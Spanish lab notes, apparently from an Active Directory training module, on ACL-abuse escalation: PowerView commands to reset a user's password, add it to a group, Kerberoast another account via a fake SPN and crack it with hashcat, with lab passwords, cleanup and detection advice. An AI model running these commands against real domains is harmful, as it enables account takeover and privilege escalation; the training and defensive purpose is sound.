ACL Abuse Tactics - Escalada wley → adunn

🔑 Contexto

Contraseña_ wley transporter@4


🖥️ Autenticarse como wley

  1. Crear un PSCredential Object:
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'transporter@4' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
  1. Crear SecureString para la nueva contraseña de damundsen:
$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
  1. Cambiar contraseña con PowerView:
    Import-Module .\PowerView.ps1
    

Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
```

✅ Resultado: Contraseña de damundsen cambiada.
{E1A86932-8E0F-48DF-B9E5-4B6F797E25E4}.png


👥 Añadir damundsen a grupo

  1. Crear PSCredential Object para damundsen:
    $SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
    

$Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)
```

  1. Comprobar miembros actuales del grupo:

    Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members
    
  2. Añadir damundsen:

    Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose
    

Pasted image 20251119093033.png
✅ Resultado: damundsen añadido correctamente.


🔑 Escalar a adunn (GenericAll)

{B36DAB3F-FAF4-409F-847A-147AD0AC6CDD}.png
✅ Resultado: Hash del TGS de adunn obtenido → crack offline con Hashcat.

hashcat -m 13100 adunn_hash.txt /usr/share/wordlists/rockyou.txt

Contraseña crackeada de adunn es SyncMaster757

Pasted image 20251119093744.png


🧹 Limpieza

  1. Remover SPN falso:
Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose
  1. Quitar damundsen del grupo:
Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose
  1. Restablecer contraseña original de damundsen (si se conoce).

📌 Nota: Documentar todo en el informe de la evaluación.


🕵️ Detección y Remediación

  1. Auditar ACLs peligrosas regularmente (usar BloodHound, PowerView).

  2. Monitorizar cambios en grupos críticos.

  3. Auditar cambios en objetos AD:

    • Activar Advanced Security Audit Policy.

    • Event ID 5136 indica modificación de objeto AD.

    • Convertir SDDL a legible:

    ConvertFrom-SddlString "<SDDL STRING>"

✅ Recomendación: Filtrar DiscretionaryAcl para detectar privilegios peligrosos (GenericWrite, GenericAll).